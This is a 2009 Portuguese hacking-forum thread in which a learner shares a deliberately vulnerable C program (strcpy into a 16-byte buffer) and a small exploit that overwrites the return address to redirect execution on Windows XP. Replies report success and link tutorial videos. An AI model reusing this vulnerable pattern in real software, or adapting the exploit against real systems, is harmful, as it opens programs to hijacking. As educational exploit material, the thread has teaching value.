Text only | Text with Images

FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: zero3020 on 06 de August , 2009, 05:31:20 PM

Title: stack buffer overflow, WinXP + SP1, pergunta
Post by: zero3020 on 06 de August , 2009, 05:31:20 PM
Eae

To testando aqui o white paper q achei nesse forum sobre stack buffer overflow com WINXP e SP1

Tenho conhecimentos basicos sobre asm e c, e conhecimentos avançados em linguagem de alto nivel pra outros fins.

Gostaria de fazer na pratica esse teste, pq na teoria ja entendi como funciona,  tenho q redirecionar o fluxo do processador pra desviar o programa pra outra função no exemplozinho bem basico.

Olhem o codigo q estou testando:
vuln.c
Code Select

#include <stdio.h>

void show_pass (){

       char *password[] = {
       "Email: test@testing.com \n",
       "Pass : this_is_a_test"
};

}

main (int argc, char **argv){

 char buffer[16];             // <-- Portal da felicidade
 strcpy (buffer, argv[1]);    // <-- Nosso bombom

}


agora o programa q desvia o fluxo do processador:
exploit.c
Code Select

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET "\x90\x12\x40\x00"

main (){

printf ("Sending exploit, please wait...\r\n\r\n");

// A funcao WinExec executa um programa e passa parametros ao mesmo.

WinExec ("\\vuln.exe yesAAAAAAAAAAAAADDDDDDDDBBBB\x90\x12\x40\x00", 0);
exit (0);

}


no caso esse exploit explora o programa de cima, enchendo de porcaria a stack até sobreescrever o endereço de retorno  com o endereço de memória da função q nao é executada q obtive dissassemblando com o gdb.

O que está errado? mesmo o WinXP com SP1 tem alguma segurança contra execução de dados?

mesmo disassemblando o programa vulneravel com o Windows 7 o gdb apresentou o mesmo endereço de memória no tutorial.

Testei o exploit acima não somente como no XP SP1 como no SP2 e outra maquina nao obtive sucesso.

O tutorial do White Shark sobre head spray funcionou certinho no XP com SP2

Gostaria muito q o pessoal aí pudesse me dar uma luz nesse exemplo. Ta phoda!

Falow
Title: Re: stack buffer overflow, WinXP + SP1, pergunta
Post by: zero3020 on 07 de August , 2009, 12:30:56 AM
consegui!!!!!!!!

um cara do IRC me ajudou! :P
Title: Re: stack buffer overflow, WinXP + SP1, pergunta
Post by: Agressor on 02 de September , 2009, 09:03:39 AM
Eu conheço esses exemplos ai eheheh. Enfim, acho que o paper de onde voce tirou isso nao explicava sua pergunta, mas pega ai o video:

http://www.hunterhacker.xpg.com.br/Stack_Overflow.part01.rar (http://www.hunterhacker.xpg.com.br/Stack_Overflow.part01.rar)

http://www.hunterhacker.xpg.com.br/Stack_Overflow.part02.rar (http://www.hunterhacker.xpg.com.br/Stack_Overflow.part02.rar)


Eh do mesmo autor =7 E o SP2 nao tem DEP.

[]'s
Text only | Text with Images